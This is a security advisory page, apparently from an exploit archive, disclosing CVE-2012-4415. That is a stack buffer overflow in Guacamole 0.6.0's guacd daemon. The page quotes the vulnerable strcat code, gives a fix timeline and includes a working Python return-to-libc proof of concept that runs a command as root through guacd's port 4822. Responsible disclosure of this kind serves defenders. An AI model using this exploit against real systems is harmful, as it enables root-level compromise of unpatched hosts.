what you don't know can hurt you

Guacamole 0.6.0 Buffer Overflow

Guacamole 0.6.0 Buffer Overflow
Posted Sep 25, 2012
Authored by Timo Juhani Lindfors

Guacamole 0.6.0 contains a trivial buffer overflow vulnerability that allows connected users to execute code with the privileges of the guacd daemon. In the Debian distribution the guacd 0.6.0-1 daemon runs as root and allows connections from unauthenticated users. However, it fortunately only listens on localhost by default. Proof of concept code included.

tags | exploit, overflow, root, proof of concept
systems | linux, debian
advisories | CVE-2012-4415
MD5 | 995fe46b49076362053293306fd95f07

Guacamole 0.6.0 Buffer Overflow

Change Mirror Download
Overview
========

"Guacamole is an HTML5 web application that provides access to desktop
environments using remote desktop protocols such as VNC or RDP. A
centralized server acts as a tunnel and proxy, allowing access to
multiple desktops through a web browser. No plugins are needed: the
client requires nothing more than a web browser supporting HTML5 and
AJAX."

-- http://guac-dev.org/

guacamole 0.6.0 contains a trivial buffer overflow vulnerability that
allows connected users to execute code with the privileges of the guacd
daemon. In the Debian distribution the guacd 0.6.0-1 daemon runs as root
and allows connections from unauthenticated users. However, it
fortunately only listens on localhost by default.

Analysis
========

The server part of guacamole consists of a web application written in
Java and a proxy daemon ("guacd") written in C. The proxy part parses
the guacamole protocol using the libguac library. This library contains
a trivial buffer overflow vulnerability. As you can see in the following
quote the code fails to validate the length of the user supplied input
before using strcpy to copy it to a fixed size buffer in stack:

guac_client_plugin* guac_client_plugin_open(const char* protocol) {

guac_client_plugin* plugin;

/* Reference to dlopen()'d plugin */
void* client_plugin_handle;

/* Client args description */
const char** client_args;

/* Pluggable client */
char protocol_lib[256] = "libguac-client-";

union {
guac_client_init_handler* client_init;
void* obj;
} alias;

/* Add protocol and .so suffix to protocol_lib */
strcat(protocol_lib, protocol);
strcat(protocol_lib, ".so");

/* Load client plugin */
client_plugin_handle = dlopen(protocol_lib, RTLD_LAZY);
if (!client_plugin_handle) {
guac_error = GUAC_STATUS_BAD_ARGUMENT;
guac_error_message = dlerror();
return NULL;


Timeline
========

2012-08-23 Vulnerability discovered and reported to upstream
2012-08-23 Upstream fixes the issue in http://guac-dev.org/trac/changeset/7dcefa744b4a38825619c00ae8b47e5bae6e38c0/libguac
2012-09-12 Fixed version (libguac 0.6.0-2) is uploaded to Debian
2012-09-19 Upstream releases 0.6.3 that includes the fix

Proof of concept
================

#!/usr/bin/python
# CVE-2012-4415: PoC for guacd buffer overflow vulnerability
#
# Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@iki.fi>
#
# Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with
# default configuration. Uses return-to-libc to bypass non-executable
# stack.
#
import socket, struct
PROTOCOL_ADDRESS = 0xbf807e9f
SYSTEM_ADDRESS = 0xb76e7640
class GuacdPOC:
def __init__(self, command):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(('localhost', 4822))
self.s("select")
self.c(",")
protocol = (command + "; " + "#" * 265)[:265]
protocol += struct.pack("L", PROTOCOL_ADDRESS)
protocol += struct.pack("L", SYSTEM_ADDRESS)
self.s(protocol)
self.c(";")
def s(self, x):
self.sock.send("%d.%s" % (len(x), x))
def c(self, x):
self.sock.send(x)
GuacdPOC("touch /tmp/owned")
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    13 Files
  • 24
    Sep 24th
    10 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close